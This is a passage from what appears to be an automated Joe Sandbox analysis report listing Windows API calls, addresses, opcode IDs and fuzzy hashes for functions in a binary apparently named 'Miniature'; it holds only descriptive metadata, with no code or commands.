                                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C75674
                                                                                                                                                                                                                                                                                            • _wcsstr.LIBVCRUNTIME ref: 00C7567E
Memory Dump Source
• Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 72514467-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 4729ebf2a14e665f9f59040dd31bcc9d7c1646835a4241d8fe46611b22287a91
                                                                                                                                                                                                                                                                                            • Instruction ID: 02c2323b2fcf68ecbe2d4ef1cf0bb0306c223d3a8ca66b79b774a220176bb2d2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4729ebf2a14e665f9f59040dd31bcc9d7c1646835a4241d8fe46611b22287a91
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 512108722046007BEB155B35DC49FBF7BACEF45750F14C029F90ACA191EFA1DD419660
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C15851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C155D1,?,?,00C54B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C15871
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C862C0
                                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00C863DA
                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00CB0CC4,00000000,00000001,00CB0B34,?), ref: 00C863F3
                                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00C86411
                                                                                                                                                                                                                                                                                            Strings
Memory Dump Source
• Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                                                                                                                            • String ID: .lnk
                                                                                                                                                                                                                                                                                            • API String ID: 3172280962-24824748
                                                                                                                                                                                                                                                                                            • Opcode ID: ba0d24b5fae5dcc3c562cc7b476d39c95bb0ac612da3f2092434a71be441ad1d
                                                                                                                                                                                                                                                                                            • Instruction ID: 88de26d8c79ce5ee5ccad7ac9463874103fc8815085cbc3921b264637cf85af4
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ba0d24b5fae5dcc3c562cc7b476d39c95bb0ac612da3f2092434a71be441ad1d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AED16274A082019FC714EF24C484A6EBBE5FF8A718F10885CF8969B361CB31ED45DB92
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00CA8740
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00CA8765
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00CA877D
                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00CA87A6
                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00C8C1F2,00000000), ref: 00CA87C6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00C124B0
                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00CA87B1
Memory Dump Source
• Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2294984445-0
                                                                                                                                                                                                                                                                                            • Opcode ID: b21400dd2b216d6f70395353b3d70ab841d88fff257bb360d9db31f478636dee
                                                                                                                                                                                                                                                                                            • Instruction ID: c9f0a5d5e563606df120e784e24098cdd0102974ea156a353d203a778babdf97
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b21400dd2b216d6f70395353b3d70ab841d88fff257bb360d9db31f478636dee
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD2160716102429FCB149F39CC48B6E3BA5EB46369F254A29F977C75E0EE308954DB10
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00C336E9,00C33355), ref: 00C33700
                                                                                                                                                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C3370E
                                                                                                                                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C33727
                                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00C336E9,00C33355), ref: 00C33779
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 67f06e35a37c32cbf0351caa622a7f3f446b1116e465d1cae0958bed4913480d
                                                                                                                                                                                                                                                                                            • Instruction ID: fddbe6bd913d804adda99ff177c950b6ed3597eb3af7cd02133aa46490a9e480
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 67f06e35a37c32cbf0351caa622a7f3f446b1116e465d1cae0958bed4913480d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B701FCB2A7F3516EA62427B5BDC676F2F94EB46775F20032AF122850F0EF515E016144
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00C34D53,00000000,?,?,00C368E2,?,?,00000000), ref: 00C430EB
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4311E
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C43146
                                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 00C43153
                                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 00C4315F
                                                                                                                                                                                                                                                                                            • _abort.LIBCMT ref: 00C43165
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 4c6d406b1fca2a30b766e6e6363f32398065ca17de1fd4bf034143e0d9c22a20
                                                                                                                                                                                                                                                                                            • Instruction ID: bff66bba5bed4b8d50e80b2e1962703375019ad185876b516df77c3c7b636db6
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c6d406b1fca2a30b766e6e6363f32398065ca17de1fd4bf034143e0d9c22a20
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D5F0F63694568127D6127735AC0BB6E277ABFC1770B250425FE36D32E2EF248F02A171
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C11F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C11F87
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C11F2D: SelectObject.GDI32(?,00000000), ref: 00C11F96
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C11F2D: BeginPath.GDI32(?), ref: 00C11FAD
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C11F2D: SelectObject.GDI32(?,00000000), ref: 00C11FD6
                                                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00CA94AA
                                                                                                                                                                                                                                                                                            • LineTo.GDI32(?,00000003,00000000), ref: 00CA94BE
                                                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00CA94CC
                                                                                                                                                                                                                                                                                            • LineTo.GDI32(?,00000000,00000003), ref: 00CA94DC
                                                                                                                                                                                                                                                                                            • EndPath.GDI32(?), ref: 00CA94EC
                                                                                                                                                                                                                                                                                            • StrokePath.GDI32(?), ref: 00CA94FC
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 43455801-0
                                                                                                                                                                                                                                                                                            • Opcode ID: b3400f947607c4d82a9213101f2f8e6fff3976f4d601537a0c5f9965a934e97b
                                                                                                                                                                                                                                                                                            • Instruction ID: e54608d8ee17daba0e928552cdfd75f1cc36c18d1eb2e05442760e1de864b40c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b3400f947607c4d82a9213101f2f8e6fff3976f4d601537a0c5f9965a934e97b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6711DB7600014DBFDF129F90DC89F9E7F6DEB09364F048011BA1A5A1A1C7719E56DBA0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00C75B7C
                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C75B8D
                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C75B94
                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00C75B9C
                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C75BB3
                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00C75BC5
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 9b00d52fd8a84efefece0b31526c49d94b2ffdbd24146264a595eda555f183a0
                                                                                                                                                                                                                                                                                            • Instruction ID: 38c49c0cb523ca3d2e5e0da770deea7b5c372263287c2bbaf1f290d8c8b56a75
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b00d52fd8a84efefece0b31526c49d94b2ffdbd24146264a595eda555f183a0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16016275E00718BBEB109FA59C49F9EBFB8EF49751F108065FA0AA7280D6709D01CFA0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C132AF
                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00C132B7
                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C132C2
                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C132CD
                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00C132D5
                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C132DD
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Virtual
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4278518827-0
                                                                                                                                                                                                                                                                                            • Opcode ID: cf85a452a1549002eb5797ee8a92d3af83e93f1410517154a8dd451234ffaced
                                                                                                                                                                                                                                                                                            • Instruction ID: 76fb2e051d1f0b4018db7ac354c396cc03e942ac4dd0d7cd1dc5d00a01a3f80c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf85a452a1549002eb5797ee8a92d3af83e93f1410517154a8dd451234ffaced
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 590167B0902B5ABDE3008F6A8C85B56FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C7F447
                                                                                                                                                                                                                                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C7F45D
                                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00C7F46C
                                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C7F47B
                                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C7F485
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C7F48C
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 839392675-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 21ae901e47b63387ca7dbf4af84f8af7747645c8c606241d2f072141e2383f87
                                                                                                                                                                                                                                                                                            • Instruction ID: 5ad489e9197a14ae1dcdc078d7e3480d4ba7256c890a6eaefd1d8b89743cfce0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21ae901e47b63387ca7dbf4af84f8af7747645c8c606241d2f072141e2383f87
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6F01D32241158BBE72157529C0EFEF3A7CEBC7B15F000058F6079209097A05A02C6B5
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?), ref: 00C534EF
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 00C53506
                                                                                                                                                                                                                                                                                            • GetWindowDC.USER32(?), ref: 00C53512
                                                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 00C53521
                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00C53533
                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000005), ref: 00C5354D
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 272304278-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 56e1160c314718408336a1c55904249253a969f15570666e0cb796c2b5b2cf84
                                                                                                                                                                                                                                                                                            • Instruction ID: b511594e85e17bad02c1337d2607daea68b09c9a7680773081e203a429a0b241
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 56e1160c314718408336a1c55904249253a969f15570666e0cb796c2b5b2cf84
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9014671500245EFDB505FA4DC08BEE7BB5FB0A326F500560FA2BA35A1DB321E91AF10
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C721CC
                                                                                                                                                                                                                                                                                            • UnloadUserProfile.USERENV(?,?), ref: 00C721D8
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C721E1
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C721E9
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00C721F2
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C721F9
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 146765662-0
                                                                                                                                                                                                                                                                                            • Opcode ID: e3fea5118bef6aa7e9fa9b7532338b125dd001093cc284733a5dcdefa6ffd3ee
                                                                                                                                                                                                                                                                                            • Instruction ID: 0ea3e94fb5987e2002ae6e440a569ebf2997cd32ed8c9bfa21352f180dfe6ccb
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e3fea5118bef6aa7e9fa9b7532338b125dd001093cc284733a5dcdefa6ffd3ee
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7AE05276104505BBDB011BA5EC0DB8EBF79FB4A726B504625F22783874CB329461DB51
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C141EA: _wcslen.LIBCMT ref: 00C141EF
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C7CF99
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7CFE0
                                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C7D047
                                                                                                                                                                                                                                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C7D075
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                            • API String ID: 1227352736-4108050209
                                                                                                                                                                                                                                                                                            • Opcode ID: 51e7dca285ebe3169a4d0f45c3694802742f5f74f5fb0192fd259fbfeeaa6ab0
                                                                                                                                                                                                                                                                                            • Instruction ID: 8fa303ee792024c31f25d4f951832feca25a405fe2186db48d7ba7c22f64272f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51e7dca285ebe3169a4d0f45c3694802742f5f74f5fb0192fd259fbfeeaa6ab0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C511F716043019BD714AF29C884BAFBBF8AF85314F048A2DF9AAD3190DB70CE459752
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 00C9B903
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C141EA: _wcslen.LIBCMT ref: 00C141EF
                                                                                                                                                                                                                                                                                            • GetProcessId.KERNEL32(00000000), ref: 00C9B998
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C9B9C7
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                                                                            • String ID: <$@
                                                                                                                                                                                                                                                                                            • API String ID: 146682121-1426351568
                                                                                                                                                                                                                                                                                            • Opcode ID: c860f36ac27d7c67d3a7511ef29442e639cbb9e0b8c59eb976106ce773333474
                                                                                                                                                                                                                                                                                            • Instruction ID: 8ca0354d0ee34c40e30f8499b602488218376ab29a011f106a5ee9eb760a51e1
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c860f36ac27d7c67d3a7511ef29442e639cbb9e0b8c59eb976106ce773333474
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 96716775A00219EFCF10EF54D598A9EBBF4BF09310F048499E856AB391CB70EE85DB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C77B6D
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C77BA3
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00C77BB4
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C77C36
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                                                                                                                            • String ID: DllGetClassObject
                                                                                                                                                                                                                                                                                            • API String ID: 753597075-1075368562
                                                                                                                                                                                                                                                                                            • Opcode ID: 6500e696e9ac6c028b02ac3e6aabaa49cdfe109577f38fbd3e0e82b90a9379b3
                                                                                                                                                                                                                                                                                            • Instruction ID: 61ebd7dfec8230a50d8ce5eb6570788ed6c63216a9b64592ec90957a6a074bb7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6500e696e9ac6c028b02ac3e6aabaa49cdfe109577f38fbd3e0e82b90a9379b3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A84163B1604208DFDB16DF64D884B9A7BB9EF48314F14C1A9AD0ADF245D7B1DE44CBA0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CA48D1
                                                                                                                                                                                                                                                                                            • IsMenu.USER32(?), ref: 00CA48E6
                                                                                                                                                                                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00CA492E
                                                                                                                                                                                                                                                                                            • DrawMenuBar.USER32 ref: 00CA4941
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                            • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                                                                                            • Opcode ID: 0eba4f8092ddea27b0d0f808c297f7d8000de2622a863bd16a8980a2af6f6ba4
                                                                                                                                                                                                                                                                                            • Instruction ID: 3722e6fc4fba904143e610592dcb4436ce9d4394304c8a0670e5a3bef5a09a67
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0eba4f8092ddea27b0d0f808c297f7d8000de2622a863bd16a8980a2af6f6ba4
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16418A74A0020AEFDB14CF61D884EABBBB9FF46329F044029F9569B250C770EE50CB60
                                                                                                                                                                                                                                                                                            APIs
